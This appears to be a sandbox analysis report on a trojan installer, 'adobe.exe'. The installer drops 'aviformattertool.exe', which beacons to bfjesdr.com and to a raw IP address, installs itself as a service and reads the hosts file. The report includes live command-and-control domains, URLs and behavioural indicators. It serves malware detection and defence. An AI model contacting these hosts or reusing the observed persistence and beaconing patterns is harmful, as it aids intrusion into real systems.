                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: unknown | DNS traffic detected: queries for: bfjesdr.com
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.22/
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.22/nq
                Source: aviformattertool.exe, 00000003.00000002.2905692727.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, aviformattertool.exe, 00000003.00000002.2905960096.000000000380C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14
                Source: is-NLBLP.tmp.1.dr | String found in binary or memory: http://LosslessAudio.org/0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                Source: is-R0SOB.tmp.1.dr | String found in binary or memory: http://lame.sf.net
                Source: is-R0SOB.tmp.1.dr | String found in binary or memory: http://lame.sf.net32bits
                Source: is-OJAID.tmp.1.dr | String found in binary or memory: http://mingw-w64.sourceforge.net/X
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://ocsp.comodoca.com0
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
                Source: is-RTU9Q.tmp.1.dr, is-JAMVB.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0O
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: http://ocsp.sectigo.com0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://ocsps.ssl.com0Q
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
                Source: adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
                Source: is-R0SOB.tmp.1.dr | String found in binary or memory: http://www.mp3dev.org/
                Source: is-R0SOB.tmp.1.dr | String found in binary or memory: http://www.mp3dev.org/ID3Error
                Source: is-B8D2L.tmp.1.dr | String found in binary or memory: http://www.mpg123.de
                Source: adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
                Source: adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU
                Source: is-L5R6H.tmp.1.dr | String found in binary or memory: https://gcc.gnu.org/bugs/):
                Source: is-JAMVB.tmp.1.dr | String found in binary or memory: https://sectigo.com/CPS0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
                Source: is-RTU9Q.tmp.1.dr | String found in binary or memory: https://www.ssl.com/repository0

                System Summary

                Source: is-ETIM8.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-ETIM8.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-N9KV6.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-N9KV6.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-N9KV6.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-SD2K4.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-SD2K4.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-CHQ62.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-CHQ62.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-USOE1.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-USOE1.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-USOE1.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-TA1T4.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-TA1T4.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-G2Q7A.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-G2Q7A.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-RTU9Q.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-QIBJG.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-QIBJG.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-QIBJG.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-G867L.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-G867L.tmp.1.dr | Static PE information: section name: (empty)
                Source: is-G867L.tmp.1.dr | Static PE information: section name: (empty)
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0042F394 NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00423B94 NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004125E8 NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045688C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004776DC NtdllDefWindowProc_A
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00454B10 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                Source: C:\Users\user\Desktop\adobe.exe | Code function: 0_2_0040840C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00466BB8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0047F1BC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0046F7F0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0048600C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004301D0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004442C4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0048C314
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045E8EC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045A994
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004449BC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00434B1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00468C40
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00430D5C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00444DC8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0045102C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_004850D8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_0043D5A4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00443D1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_00433E18
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_02311260
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: 1_2_02311D20
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 2_2_00401051
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 2_2_00401C26
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_00401051
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_00401C26
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A2E1CD
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A29EC4
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A34E69
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A1EFFA
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A28482
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A2DCD9
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A2AC7A
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A2E5E5
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: 3_2_02A32DF4
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy) 59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 004458F8 appears 59 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00405964 appears 110 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00445628 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00408C14 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00406ACC appears 39 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00403400 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00433D30 appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 004078FC appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00457214 appears 70 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00403494 appears 82 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00457008 appears 93 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 004529B4 appears 91 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Code function: String function: 00403684 appears 219 times
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: String function: 02A28B20 appears 37 times
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe | Code function: String function: 02A35370 appears 138 times
                Source: adobe.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: adobe.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: adobe.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: adobe.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: adobe.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-OJAID.tmp.1.drStatic PE information: Number of sections : 11 > 10
                Source: is-2NPHT.tmp.1.drStatic PE information: Number of sections : 11 > 10
                Source: is-1V9NR.tmp.1.drStatic PE information: Number of sections : 11 > 10
                Source: adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs adobe.exe
                Source: adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs adobe.exe
                Source: adobe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: aviformattertool.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: JSON Nested Objects 66.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: is-ETIM8.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                Source: is-CHQ62.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                Source: is-USOE1.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                Source: is-G2Q7A.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                Source: is-QIBJG.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                Source: classification engineClassification label: mal100.troj.evad.winEXE@7/102@1/2
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A208F8 FormatMessageA,GetLastError,3_2_02A208F8
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00454B10 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B10
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00455338 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,1_2_00455338
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,2_2_0040259B
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,3_2_0040259B
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_0040219E StartServiceCtrlDispatcherA,2_2_0040219E
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_0040219E StartServiceCtrlDispatcherA,2_2_0040219E
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_0040219E StartServiceCtrlDispatcherA,3_2_0040219E
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpFile created: C:\Users\user\AppData\Local\AVI formatter toolJump to behavior
                Source: C:\Users\user\Desktop\adobe.exeFile created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmpJump to behavior
                Source: C:\Users\user\Desktop\adobe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\adobe.exeFile read: C:\Users\user\Desktop\adobe.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\adobe.exe C:\Users\user\Desktop\adobe.exe
                Source: C:\Users\user\Desktop\adobe.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp "C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe"
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -i
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpProcess created: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe "C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -s
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp | Window found: window name: TMainForm
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: adobe.exe | Static file information: File size 4855286 > 1048576
                Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-R0SOB.tmp.1.dr
